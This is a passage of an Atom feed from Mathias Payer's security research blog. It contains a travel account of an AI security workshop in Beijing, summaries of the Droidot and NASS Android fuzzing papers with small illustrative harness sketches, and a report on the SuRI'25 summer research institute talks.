underlying apps, Marcel was the driver behind the global confusion bug pattern
and the rollback attacks.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Hacking"></category><category term="Research"></category><category term="Security"></category><category term="39c3"></category></entry><entry><title>AISec and the exploration of the Chinese soul</title><link href="/blog/2025/1130-aisec.html" rel="alternate"></link><published>2025-11-30T13:24:00-05:00</published><updated>2025-11-30T13:24:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-11-30:/blog/2025/1130-aisec.html</id><summary type="html">&lt;p&gt;Just a few weeks ago, &lt;a class="reference external" href="https://netsec.ccert.edu.cn/people/chaoz/"&gt;Chao Zhang&lt;/a&gt;
invited me to a workshop on AI security at Tsinghua University in Beijing. Chao
and I overlapped as postdocs in Dawn Song's BitBlaze group at UC Berkeley,
and we're both deeply interested in low-level systems security, binary analysis,
fuzzing, and mitigation …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Just a few weeks ago, &lt;a class="reference external" href="https://netsec.ccert.edu.cn/people/chaoz/"&gt;Chao Zhang&lt;/a&gt;
invited me to a workshop on AI security at Tsinghua University in Beijing. Chao
and I overlapped as postdocs in Dawn Song's BitBlaze group at UC Berkeley,
and we're both deeply interested in low-level systems security, binary analysis,
fuzzing, and mitigation of vulnerabilities. In addition, we're both avid CTF
players. As I heard that Zhenkai Liang and Lorenzo Cavallaro would also be
speaking at the workshop, it was clear that I had to go to meet with old friends
and to make new ones!&lt;/p&gt;
&lt;div class="section" id="meeting-past-visitors"&gt;
&lt;h2&gt;Meeting past visitors&lt;/h2&gt;
&lt;p&gt;Upon arrival in Beijing, I breezed through security. Thanks to the visa-free
travel, getting into China has become a smooth process for European citizens.&lt;/p&gt;
&lt;p&gt;&lt;img alt="airport" src="/blog/static/2025/1130/airport.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;At the airport, I was warmly welcomed by Zezhong Ren (PhD student at the Chinese
Academy of Science) and Yishun Zeng (PhD student at Tsinghua University). Both
of them visited my group for a year for an exchange where we worked together on
automated testing. Yishun worked on testing browsers and Zezhong targeted
under-fuzzed areas in the Linux kernel. After a quick ride to the hotel to drop
off my bag, we went to explore the Qianhai food market where we ate tripe in
peanut sauce. Over-indulgence in food will be a common pattern during this
trip, but it highlights some interesting cultural differences, so stay with
me. While tripe was commonly eaten in Liechtenstein in the '80s, it quickly
went out of fashion. Apparently, it's still a specialty of Chinese cuisine.&lt;/p&gt;
&lt;p&gt;&lt;img alt="trip" src="/blog/static/2025/1130/trip.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="view" src="/blog/static/2025/1130/view.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;After an extensive walk along Qianhai with a beautiful view, we explored old
Beijing with its single-story houses and closed-off courtyards. As an active
GeoCacher, I had to show them this amazing sport and we even managed to find a
cache I did not find in 2016 during my first visit to Beijing.&lt;/p&gt;
&lt;p&gt;At the restaurant, we met up with Zheyu Ma, also a former visitor and a recent
graduate of Tsinghua University, to eat like kings and share a few stories.
What followed was an extensive meal with Peking duck, &amp;quot;Chinese tacos&amp;quot;, and my
first encounter with Maotai, a strong liquor distilled from sorghum that is often
drunk during celebrations or business meetings. To me, the get together was of
course more on the celebration than on the business side. I deeply appreciated
my former students taking me along and sharing their culture, city, and
background with me.&lt;/p&gt;
&lt;p&gt;&lt;img alt="duck" src="/blog/static/2025/1130/duck.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;It was interesting to observe the Chinese toasting culture, where people make
toasts, engage, share some nice words, and then continue. For a Westerner who is
used to drinking at their own pace, the synchronized toasting was an interesting
difference. Back home, we would, for example, get a beer or other drinks, toast
at the beginning, and then everyone would sip at their own pace. Here, instead,
we would toast and drink together.&lt;/p&gt;
&lt;p&gt;Back at the hotel, I caught up with emails and work before (trying to) crash and
fight jetlag.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="aisec-and-tsinghua"&gt;
&lt;h2&gt;AISec and Tsinghua&lt;/h2&gt;
&lt;p&gt;In the morning I had a hard time waking up as my body told me that it was just
midnight when the alarm woke me. With only one eye open, I met Zhenkai for a
Chinese breakfast with noodle soup, Chinese tacos, dumplings, and steamed buns.
I really could get used to savory breakfasts. Compared to my default Müsli, this
was an interesting difference. After rushing through Beijing traffic to Tsinghua
University, we had a great morning of talks and an even better afternoon of
discussions.&lt;/p&gt;
&lt;p&gt;&lt;img alt="tsinghua" src="/blog/static/2025/1130/tsinghua.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;The discussions focused on protecting systems against attacks, potentially using
AI technologies. Chao has pushed a strong research agenda in binary similarity
and analyzing weaknesses automatically. The future will likely be semi-automated
systems that support developers in finding bugs and guiding them through
patches.&lt;/p&gt;
&lt;p&gt;&lt;img alt="discussions" src="/blog/static/2025/1130/discussions.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Overall, the workshop was very enlightening with diverse topics around bug
finding and protection of systems. It's great to see other groups focusing on
system security. In a world where attackers generally have an edge, groups
working on defenses must join forces to share ideas, knowledge, and approaches.&lt;/p&gt;
&lt;p&gt;&lt;img alt="dinner" src="/blog/static/2025/1130/dinner.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;After extensive discussions, we went to a fancy restaurant (are restaurants in
China ever not fancy?) to eat hot pot, this time with a plain broth to better
savor the different meats. We mostly focused on lamb but also had interesting
mushrooms and different cabbages. To drink, we got a corn-based hot beverage
along with the typical hot water.&lt;/p&gt;
&lt;p&gt;&lt;img alt="olympic" src="/blog/static/2025/1130/olympic.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;After the extensive dinner, we needed to walk off some calories and used the
opportunity for a long stroll through the Olympic village from the Beijing
Olympics. The sports structures remain heavily used, even in winter, and lots
of people enjoyed the vast area to take strolls, meet, chat, and linger
around with a drink. It was great to see so many people walk and enjoy the area
in a big city. Also, it was quite different from the Forbidden City as it was a
bit less touristy (but only slightly so).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="tianjin-and-chenguantunzhen"&gt;
&lt;h2&gt;Tianjin and Chenguantunzhen&lt;/h2&gt;
&lt;p&gt;On my final day of this short trip, we took the fast train to Tianjin, a city
near the coast, to explore Zhenkai's home town. He graciously offered to
show us his home and the area and culture where he grew up. Taking the Chinese fast
trains is always an experience, zipping through the backlands at over 300 km/h
never ceases to amaze me --- and I'm a tad sad that Europe does not manage to
build such a great inter-connected train system.&lt;/p&gt;
&lt;p&gt;&lt;img alt="train" src="/blog/static/2025/1130/train.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;If you haven't noticed so far, it's customary to eat a lot in China. And in the
train, we tried local cookies with plum, bean paste, and rose petals. My
favorites were the bean paste ones, followed by plum. I somehow can't get used to
the rose petals.&lt;/p&gt;
&lt;p&gt;&lt;img alt="heritage" src="/blog/static/2025/1130/heritage.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;From Tianjin, Zhenkai's dad drove us to &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Chengguan,_Tianjin"&gt;Chenguantunzhen&lt;/a&gt;, a small town nearby. We
explored the heritage museum that showcased the extremely rapid transformation
this region went through: from clay houses with single
family beds to high rises, all in about one generation. Chinese society
leapfrogged across one or two generations, and I wonder how people managed to
keep up in such a fast-paced, fast-changing world.&lt;/p&gt;
&lt;p&gt;&lt;img alt="cabbage" src="/blog/static/2025/1130/cabbage.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;The area is defined by agriculture and its fields, and I'm sure you
don't mind me bringing up the customary &amp;quot;&lt;a class="reference external" href="https://tvtropes.org/pmwiki/pmwiki.php/RunningGag/AvatarTheLastAirbender"&gt;my cabbages&lt;/a&gt;&amp;quot;
joke.&lt;/p&gt;
&lt;p&gt;&lt;img alt="heritage2" src="/blog/static/2025/1130/heritage2.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Later we drove to the street where Zhenkai grew up, in one of those square lots
that contains a small house with 3 rooms (bedroom, kitchen, second room) along
with a large storage area. Interestingly, the houses are surrounded by high
walls. Apparently, this is due to the lack of security into the 1970s in these
regions, where burglary remained common. This somewhat explains society's desire
for protection and security, often trading off privacy (or our notion of
privacy) for a sense of physical security.&lt;/p&gt;
&lt;p&gt;&lt;img alt="field" src="/blog/static/2025/1130/field.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;The people in the area are farmers. While the larger fields outside are
cultivated using big equipment, the fields closer to the village remain
allocated to the different families so that they can grow their rice, their
corn, their cabbages, and other vegetables.&lt;/p&gt;
&lt;p&gt;&lt;img alt="market" src="/blog/static/2025/1130/market.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Apparently the region is well known for its nuts, especially peanuts, but also
different forms of popcorn. Also, you can't buy just a small bag, as the
smallest size they had was about 5kg. Of course, we had to indulge.&lt;/p&gt;
&lt;p&gt;&lt;img alt="lunch" src="/blog/static/2025/1130/lunch.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;This amazing visit was rounded off with a lunch where we tasted several local
dishes, carp from the Grand Canal, and bean paste omelettes. I'm deeply thankful
to Zhenkai for showing me his heritage and the local customs. Ten years ago, I
visited China as a tourist. This time, I learned about the local customs. While
this is only one glimpse into the local culture, it widened my horizon. I will
definitely be back to explore more. And I'm also looking forward to excellent
research collaborations.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="Research"></category><category term="Security"></category><category term="China"></category></entry><entry><title>Droidot: Vulnerable Native Libraries on Android</title><link href="/blog/2025/0813-droidot.html" rel="alternate"></link><published>2025-08-13T13:24:00-04:00</published><updated>2025-08-13T13:24:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-08-13:/blog/2025/0813-droidot.html</id><summary type="html">&lt;p&gt;Android is a complex platform with diverse, concurrently running services.
Looking at user space, the assumption is that each app is isolated from all
others running on top of the rich Android runtime system. Unfortunately, the
available system libraries are heavily limited and Android apps often ship
diverse libraries. These libraries …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Android is a complex platform with diverse, concurrently running services.
Looking at user space, the assumption is that each app is isolated from all
others running on top of the rich Android runtime system. Unfortunately, the
available system libraries are heavily limited and Android apps often ship
diverse libraries. These libraries are often written in low-level languages like
C/C++ and called through JNI (the Java Native Interface). Sadly, many of these
libraries are not updated and, surprisingly, many libraries are shared among
many apps.&lt;/p&gt;
&lt;p&gt;&lt;img alt="droidot" src="/blog/static/2025/0813/droidot.png" /&gt;&lt;/p&gt;
&lt;p&gt;We set out to study this ecosystem by analyzing how diverse these libraries are,
whether they are updated, and whether they are exploitable. Our goal was to analyze how
libraries are used, create fuzz harnesses that replicate the library usage, and
fuzz the libraries using a mock Android environment.&lt;/p&gt;
&lt;p&gt;The key contribution of &lt;a class="reference external" href="https://nebelwelt.net/files/25SEC2.pdf"&gt;Poirot/Droidot&lt;/a&gt; is an analysis platform that takes
Android apps and creates a realistic fuzz harness for the included native
libraries. A challenge is the extraction of realistic interactions with the
library. Our approach analyzes the Java part of the app and extracts JNI calls
to recover the interaction between high-level and low-level interfaces. Our
analysis is sensitive to call sequences and argument-value flow, creating
realistic interaction patterns. We then create a customized lightweight Android
environment that allows multiple round trips between high-level and native code.&lt;/p&gt;
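&lt;p&gt;The harness structure can be pictured with a small sketch. The following Python toy is purely illustrative (Droidot itself generates native harnesses from real APKs; every name and call here is invented): it shows the core idea of replaying a recovered JNI call sequence while injecting fuzz input only into the argument slots that carried app input.&lt;/p&gt;

```python
# Illustrative sketch (NOT Droidot's actual code): replay a recovered
# JNI call sequence against a native library, feeding fuzz input only
# into the arguments the app actually derives from external data.

from dataclasses import dataclass
from typing import Callable

@dataclass
class JniCall:
    name: str            # native method name recovered from the Java side
    fixed_args: tuple    # constant arguments observed in the app
    fuzzed_slots: tuple  # indices of arguments replaced with fuzz input

def replay(sequence: list[JniCall], lib: dict[str, Callable], data: bytes) -> list:
    """Drive the library through the same call order the app uses."""
    results = []
    for call in sequence:
        args = list(call.fixed_args)
        for slot in call.fuzzed_slots:
            args[slot] = data  # mutated bytes go where app input flowed
        results.append(lib[call.name](*args))
    return results

# Hypothetical usage: a library initialized once, then fed input data.
mock_lib = {
    "nativeInit": lambda quality: None,
    "nativeDecode": lambda buf: len(buf),
}
seq = [
    JniCall("nativeInit", (90,), ()),       # constant flag stays fixed
    JniCall("nativeDecode", (b"",), (0,)),  # slot 0 carries fuzz input
]
results = replay(seq, mock_lib, b"\xff\xd8\xff")
```

&lt;p&gt;The point of the design is that the library sees the same initialization order and constant arguments as in the real app, so crashes found this way are more likely to be reachable in practice.&lt;/p&gt;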
&lt;p&gt;We fuzz the 3,967 most popular APKs from the Google Play store that contain
native libraries, discovering 4,282 crashes. After triaging the top 200, we
identify 34 vulnerabilities across 34 apps, with 3 CVEs assigned. &lt;a class="reference external" href="https://github.com/HexHive/Droidot"&gt;Droidot is
open-source&lt;/a&gt; and we invite you to play
with it!&lt;/p&gt;
&lt;p&gt;This work was a collaboration among Luca di Bartolomeo, Philipp Mao, Yu-Jye
Tung, Jessy Ayala, Samuele Doria, Paolo Celada, Marcel Busch, Joshua Garcia,
Eleonora Losiouk, and Mathias Payer. Luca was the main student on the project
working on the mock environment and, together with Philipp, triaged all the
crashes. Kudos to them for the heavy lifting!&lt;/p&gt;
</content><category term="Academia"></category><category term="Android"></category><category term="libraries"></category><category term="SEC"></category></entry><entry><title>NASS: Fuzzing Native Android System Services</title><link href="/blog/2025/0813-nass.html" rel="alternate"></link><published>2025-08-13T13:24:00-04:00</published><updated>2025-08-13T13:24:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-08-13:/blog/2025/0813-nass.html</id><summary type="html">&lt;p&gt;Android is a complex platform with diverse, concurrently running services. In
the past, we focused on privileged components such as &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC2.pdf"&gt;fuzzing the secure
monitor with EL3XIR&lt;/a&gt;, &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC4.pdf"&gt;targeting
trusted applications&lt;/a&gt;, or even
&lt;a class="reference external" href="https://nebelwelt.net/files/24SEC.pdf"&gt;surveying the use of rollback counters in trusted applications&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img alt="nass" src="/blog/static/2025/0813/nass.png" /&gt;&lt;/p&gt;
&lt;p&gt;As more and more components get secured and hardened, we …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Android is a complex platform with diverse, concurrently running services. In
the past, we focused on privileged components such as &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC2.pdf"&gt;fuzzing the secure
monitor with EL3XIR&lt;/a&gt;, &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC4.pdf"&gt;targeting
trusted applications&lt;/a&gt;, or even
&lt;a class="reference external" href="https://nebelwelt.net/files/24SEC.pdf"&gt;surveying the use of rollback counters in trusted applications&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img alt="nass" src="/blog/static/2025/0813/nass.png" /&gt;&lt;/p&gt;
&lt;p&gt;As more and more components get secured and hardened, we wanted to look at the
remaining attack surface. The assumption is that an attacker has code execution
in user space as part of an untrusted app and they try to escalate their
privileges to a system service. In the past, exploitation often involved
triggering kernel bugs. As more and more kernel components are rewritten in Rust, this
attack vector is increasingly mitigated. For example, the Binder IPC interface
in the kernel is now largely written in Rust and therefore no longer exposed to
memory corruption.&lt;/p&gt;
&lt;p&gt;Attackers are therefore increasingly targeting system services through the
Binder interface. While previous work identified this attack surface, it did
not support proprietary services, i.e., services without source code,
running natively on a device. These services are still written in C/C++ and
therefore vulnerable to memory corruption.&lt;/p&gt;
&lt;p&gt;We therefore analyzed this new privilege layer of native system services and
worked on a static analysis that recovers the Binder interface and creates
fuzzing harnesses for on-device fuzzing of these custom privileged services.
&lt;a class="reference external" href="https://nebelwelt.net/files/25SEC3.pdf"&gt;NASS&lt;/a&gt; introduces
&lt;em&gt;deserialization-guided interface extraction&lt;/em&gt; to analyze the underlying Binder
interface exposed in the native system services and automatically creates
fuzzing harnesses. Through our design, we address two key challenges: interface
awareness (i.e., we know how to interact with the service) and coverage (i.e.,
we can give the fuzzer feedback on what functionality it already explored).
Effectively fuzzing RPC servers is only possible with awareness of the exposed
interface, such as the API calls and the expected data formats.&lt;/p&gt;
&lt;p&gt;The key idea behind NASS is that RPC frameworks generally leverage a compiler to
translate the interface description into native code. This automatically
generated code follows a clear translation pattern that we reverse to recover
the interface description. Applied to native services, this gives us a grammar
to fuzz the broad RPC interface.&lt;/p&gt;
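&lt;p&gt;As a toy illustration of why generated deserialization code yields a grammar, consider the following Python sketch (NOT NASS's actual analysis; the interface table, transaction codes, and argument types are invented for illustration): once the ordered read* pattern of a transaction handler is known, well-typed requests can be serialized directly from it.&lt;/p&gt;

```python
# Illustrative sketch: generated Binder-style stubs deserialize arguments
# in a fixed order, so the sequence of read* calls in a transaction
# handler doubles as a grammar for generating well-typed fuzz inputs.

import random
import struct

# Hypothetical recovered interface: transaction code -> argument types,
# as one might infer from a readInt32/readString pattern in the stub.
interface = {
    1: ["int32", "string"],   # e.g. a setter taking an int and a tag
    2: ["int32"],             # e.g. a getter taking an id
}

def make_parcel(code: int, types: list[str], rng: random.Random) -> bytes:
    """Serialize a random but well-typed request for one transaction."""
    out = struct.pack("<I", code)  # transaction code header
    for t in types:
        if t == "int32":
            out += struct.pack("<i", rng.randrange(-2**31, 2**31))
        elif t == "string":
            s = bytes(rng.randrange(256) for _ in range(rng.randrange(8)))
            out += struct.pack("<I", len(s)) + s  # length-prefixed bytes
    return out

rng = random.Random(0)  # deterministic for the example
code = rng.choice(list(interface))
parcel = make_parcel(code, interface[code], rng)
```

&lt;p&gt;In the real setting, the recovered types come from reversing the compiled stub code rather than from a hand-written table, but the principle is the same: the deserialization order is the grammar.&lt;/p&gt;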
&lt;p&gt;In our evaluation, we explored a broad range of 528 proprietary system services on
five recent devices from Google, Xiaomi, Samsung, and OnePlus. We managed to target
diverse services on proprietary devices, resulting in 12 vulnerabilities and 5
CVEs. &lt;a class="reference external" href="https://github.com/HexHive/NASS"&gt;NASS is open-source&lt;/a&gt; and we invite you
to play with it!&lt;/p&gt;
&lt;p&gt;This work was a collaboration among Philipp Mao, Marcel Busch, and Mathias
Payer. Philipp handled all the heavy lifting and, together with Marcel, deserves
the main credit for this work.&lt;/p&gt;
</content><category term="Academia"></category><category term="Android"></category><category term="fuzzing"></category><category term="SEC"></category></entry><entry><title>SuRI'25 on Security, Systems, and Formal Methods</title><link href="/blog/2025/0613-suri.html" rel="alternate"></link><published>2025-06-13T17:55:00-04:00</published><updated>2025-06-13T17:55:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-06-13:/blog/2025/0613-suri.html</id><summary type="html">&lt;p&gt;The &lt;a class="reference external" href="https://suri.epfl.ch"&gt;Summer Research Institute (SuRI)&lt;/a&gt; is a premier
venue to discuss recent research results. Each year we invite the top faculty in
a given topic to present their research in front of an interested crowd of
students, faculty, researchers, fellows from EPFL, the Vaud area, Switzerland,
and abroad.&lt;/p&gt;
&lt;p&gt;This year …&lt;/p&gt;</summary><content type="html">&lt;p&gt;The &lt;a class="reference external" href="https://suri.epfl.ch"&gt;Summer Research Institute (SuRI)&lt;/a&gt; is a premier
venue to discuss recent research results. Each year we invite the top faculty in
a given topic to present their research in front of an interested crowd of
students, faculty, researchers, fellows from EPFL, the Vaud area, Switzerland,
and abroad.&lt;/p&gt;
&lt;p&gt;This year, our focus was security, systems, and formal methods. This distinct
systems focus allowed us to explore upcoming problems in consensus, reliability,
distributed systems, verification, and cyber defense. Over two days we heard
from ten amazing speakers complemented by mentoring and poster sessions and a
neat walking tour through Lausanne.&lt;/p&gt;
&lt;p&gt;&lt;img alt="suri1" src="/blog/static/2025/0613/suri1.jpg" /&gt;&lt;/p&gt;
&lt;div class="section" id="natacha-crooks-scaling-decentralized-trust-with-databases"&gt;
&lt;h2&gt;Natacha Crooks: Scaling Decentralized Trust with Databases&lt;/h2&gt;
&lt;p&gt;Natacha started with a background on Byzantine fault tolerance and how it
applies to distributed and shared ledgers.
Basil, the fault-tolerant system from her group, consists of three core
components: concurrency control, which detects concurrent conflicting operations on
replicas; atomic commit, which ensures consistency across replicas and shards;
and a fallback component, which ensures that Byzantine participants cannot stall
honest clients.
Following the description of Basil, Natacha introduced Pesto, a query
engine on top of Basil that runs complex SQL benchmarks without code
modifications at 3-5x better performance than previous approaches.
Interestingly, they demonstrated that the system is only 10-35% slower than
classic systems, demonstrating great performance.
Fault tolerance matters, and append-only ledgers are just databases.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="aurojit-panda-runtime-verification-of-distributed-systems"&gt;
&lt;h2&gt;Aurojit Panda: Runtime Verification of Distributed Systems&lt;/h2&gt;
&lt;p&gt;We have protocol specifications but how do we prove the correctness of a given
implementation? The key is to specify the protocol in a way that aids
the search.
A key finding is that static analysis can enable lightweight runtime
verification that does not affect failure properties and has low runtime
overhead.
The system cannot detect bugs outside of the specification or performance bugs;
a bug is detectable only if it is visible at runtime and can be instantiated.
The biggest challenge remains the lack of specification and corresponding
unawareness of what it means for a program to be correct.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="caroline-trippel-design-and-formal-verification-of-hardware-software-security-contracts"&gt;
&lt;h2&gt;Caroline Trippel: Design and Formal Verification of Hardware-Software Security Contracts&lt;/h2&gt;
&lt;p&gt;As it turns out, modern hardware is incredibly complex and side channels exist.
Sadly, I missed part of the talk due to organizing lunch.
Caroline presented several recent works from her group on enforcing security
guarantees under different attacker models, especially also micro-architectural
side channels.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="peter-pietzuch-improving-cloud-security-with-hardware-memory-capabilities"&gt;
&lt;h2&gt;Peter Pietzuch: Improving Cloud Security with Hardware Memory Capabilities&lt;/h2&gt;
&lt;p&gt;Clouds have performance/isolation trade-offs and require strong isolation
between tenants. Workloads require efficient sharing between isolation domains
for performance and to limit overhead. There's redundant memory content at all
levels. The goal of Peter's research therefore is to rethink the cloud stack
with new hardware or custom-tailored hardware extensions.&lt;/p&gt;
&lt;p&gt;One goal is to break down isolation barriers by enabling memory capabilities.
That way, systems can avoid the MMU tax and reduce the cost of address
translation. Another angle is the focus on de-privileging system software and
small TCBs by breaking systems into smaller parts. The underlying goal is to
minimize disruption to existing applications by accepting changes to the
privileged systems.&lt;/p&gt;
&lt;p&gt;The two papers that Peter presented were CAP-VMs from OSDI'22 where they go into
details to enable strong isolation with fine-grained data sharing and ORC from
OSDI'23 where they look at concrete memory deduplication with semantic object
reuse.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="lesly-ann-daniel-hardware-software-co-designs-for-microarchitectural-security"&gt;
&lt;h2&gt;Lesly-Ann Daniel: Hardware-software co-designs for microarchitectural security&lt;/h2&gt;
&lt;p&gt;Mitigations are facing a hard time under micro-architectural side channels. The
complexity of modern processors opens up a large area of potential attack
vectors. Lesly-Ann focused on recent works that address these side channels.&lt;/p&gt;
&lt;p&gt;She presented ProSpeCT from Usenix SEC'23, a defense that
hardens constant-time code against SPECTRE attacks. The challenge of SPECTRE
mitigations is that one must enumerate all possible branches that could be
vulnerable and harden them individually. For constant-time code, the
software should not be responsible for tracking potential speculation. The goal
is to prove that software is constant time and then use hardware-software
contracts to ensure underlying guarantees.&lt;/p&gt;
&lt;p&gt;After lessons learned about protecting against SPECTRE, Lesly-Ann focused on
securing constant time execution through different compiler extensions. At a
high level, Libra from CCS'24 balances executions for complex processors. The
key idea is to balance executions so that they leak the same set of secrets by going
through the code in a carefully balanced way that orchestrates
micro-architectural state.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="vyas-sekar-enabling-ai-based-autonomous-security-operations"&gt;
&lt;h2&gt;Vyas Sekar: Enabling AI-based Autonomous Security Operations&lt;/h2&gt;
&lt;p&gt;Due to the complexity, it is extremely challenging to evaluate the security of
autonomous systems. As a case study, Vyas and his team implemented a mock
environment for the Equifax system. The key challenge was to model the different
defenses and detection systems which resulted in a complex configuration of
mangled systems.&lt;/p&gt;
&lt;p&gt;After discussing the design and MHBench system to evaluate the cyber range, Vyas
talked about deception insights, novel LLM-based attackers, robust and stealthy
attackers, and opportunities for LLM-based defenders.&lt;/p&gt;
&lt;p&gt;In systems, there are only three novel ideas: use an abstraction layer, use a
level of indirection, or create a cache.&lt;/p&gt;
&lt;p&gt;Vyas discussed MHBench as a general platform to implement different strategies
for attackers and deception based on static and dynamic properties and a variety
of capabilities such as decoy hosts or files along with various attack
strategies that mimic APTs and replicate real-world settings.&lt;/p&gt;
&lt;p&gt;To evaluate the MHBench system, they used LLMs and existing pen testing queries
to try to exfiltrate data from the network. Interestingly, LLMs were unable to
do end-to-end multistage attacks. This was mostly due to the LLMs having to
generate lots of coherent low-level code and their inability to keep track of
state at that level. But using high-level abstractions, they were able to
guide the LLM to produce an end-to-end attack. Their tool &lt;a class="reference external" href="https://github.com/bsinger98/Incalmo"&gt;Incalmo&lt;/a&gt; is open source and available to try.&lt;/p&gt;
&lt;p&gt;Going forward, a key question will be how to leverage these results to scale up
the evaluation and how to leverage this to test your systems.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="bozidar-radunovic-the-future-of-mobile-cellular-connectivity-is-programmable"&gt;
&lt;h2&gt;Bozidar Radunovic: The future of mobile cellular connectivity is programmable&lt;/h2&gt;
&lt;p&gt;Cellular networks have become complex and run multiple layers of software on
diverse hardware. One key difference is that for wireless, you can communicate
with several clients at the same time due to separation in the frequency domain.&lt;/p&gt;
&lt;p&gt;Bozidar went into details on how to build and deploy such a network, including
running large parts on an open-source stack. Even though the systems are
open-source, one of the challenges is that the code is complex, which makes
it difficult to change individual aspects without breaking other tangential
features.&lt;/p&gt;
&lt;p&gt;To tackle this complexity, Bozidar introduced eBPF-based hooks that allow him to
measure diverse properties of the network. Similar to the Linux kernel, these
hooks allow introspection without requiring heavy changes of the underlying
system. Using customizable hooks (codelets), they managed to analyze diverse
interference attacks using these lightweight probes as a sample application. But
many other use cases are possible.&lt;/p&gt;
&lt;p&gt;Looking at data, interestingly many base stations have very low utilization,
including during peak times. There's an immense opportunity to save energy
by switching off idle cells and ensuring coverage through nearby cells.
The challenge here is that RAN software has real-time deadlines (within tens of ms),
CPU load can experience spikes at ms granularity, and RAN software is a black
box. This setup makes it challenging to optimize in this environment.&lt;/p&gt;
&lt;p&gt;Key message: cellular networks are exciting, and it's easy to build a network
yourself. Small changes can have a huge impact and network programmability can
enable next-gen apps!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="ivan-de-oliveira-nunes-provable-execution-in-real-time-embedded-systems"&gt;
&lt;h2&gt;Ivan De Oliveira Nunes: Provable Execution in Real-Time Embedded Systems&lt;/h2&gt;
&lt;p&gt;Embedded systems are used in diverse contexts, interact with the environment
through sensors, and signal status to other systems. Enforcing security properties on
deeply embedded systems is challenging, as code often runs bare-metal without any
security mitigations. Ivan's key question is whether it's possible to guarantee
some level of service for embedded systems even if part of the embedded system
is compromised.&lt;/p&gt;
&lt;p&gt;Protecting embedded systems is hard as there is generally no virtual memory
abstraction and all applications run, along with the OS, in the same address
space. Newer embedded systems may allow some secure enclaves that share the same
CPU but allow security-critical operations.&lt;/p&gt;
&lt;p&gt;In a nutshell, they allow potentially dangerous interferences to go through but
log everything using a monitor in the trusted enclave. It only works because of
the passive checks guaranteeing integrity (but not availability). A trusted
verifier can then assess if the execution was correct.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="tianyin-xu-software-reliability-in-emerging-cloud-computing-paradigms"&gt;
&lt;h2&gt;Tianyin Xu: Software Reliability in Emerging Cloud Computing Paradigms&lt;/h2&gt;
&lt;p&gt;Tianyin gave a great overview and deep dive into software reliability. I sadly
missed this talk due to the organization of the walking tour.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="ana-klimovic-rethinking-cloud-system-software-and-abstractions-for-true-elasticity-in-the-cloud-native-era"&gt;
&lt;h2&gt;Ana Klimovic: Rethinking Cloud System Software and Abstractions for True Elasticity in the Cloud-Native Era&lt;/h2&gt;
&lt;p&gt;Last but not least, Ana talked about performance optimizations for cloud
applications. She especially highlighted performance optimizations in her
Dandelion system and how to further improve cloud workloads and systems.
As with Tianyin's, I sadly missed parts of her talk due to admin duties.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="concluding-thoughts"&gt;
&lt;h2&gt;Concluding thoughts&lt;/h2&gt;
&lt;p&gt;Overall, SuRI was a great success. We had over 100 attendees, 10 speakers, and 5
organizers attending amazing talks and asking lots of questions. We hope that the
discussions at SuRI will trigger lots of new collaborations, and we look forward to
the coming years!&lt;/p&gt;
&lt;p&gt;&lt;img alt="suri2" src="/blog/static/2025/0613/suri2.jpg" /&gt;&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="SuRI"></category></entry><entry><title>NDSS25: Exploring San Diego</title><link href="/blog/2025/0227-ndss.html" rel="alternate"></link><published>2025-02-27T12:55:00-05:00</published><updated>2025-02-27T12:55:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-02-27:/blog/2025/0227-ndss.html</id><summary type="html">&lt;p&gt;What a great time at the NDSS Symposium in San Diego. While it is always about
meeting friends, catching up on projects, discussing new and exciting research
and looking for potential collaborations, the HexHive lab also had the pleasure
to present a total of four research papers at this conference …&lt;/p&gt;</summary><content type="html">&lt;p&gt;What a great time at the NDSS Symposium in San Diego. While it is always about
meeting friends, catching up on projects, discussing new and exciting research
and looking for potential collaborations, the HexHive lab also had the pleasure
to present a total of four research papers at this conference!
While the new location is no longer right at the beach, it has its perks with
lots more restaurants nearby and great piers to stroll along.&lt;/p&gt;
&lt;p&gt;&lt;img alt="ndss1" src="/blog/static/2025/0227/ndss1.jpg" /&gt;&lt;/p&gt;
